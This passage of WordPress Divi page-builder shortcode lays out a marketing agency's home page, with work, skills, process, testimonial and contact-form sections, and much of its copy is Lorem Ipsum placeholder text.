animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-Copy-12.png\" alt=\"digital advertising\" title_text=\"digital advertising\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-07-1.png\" title_text=\"home-office-07-1\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" 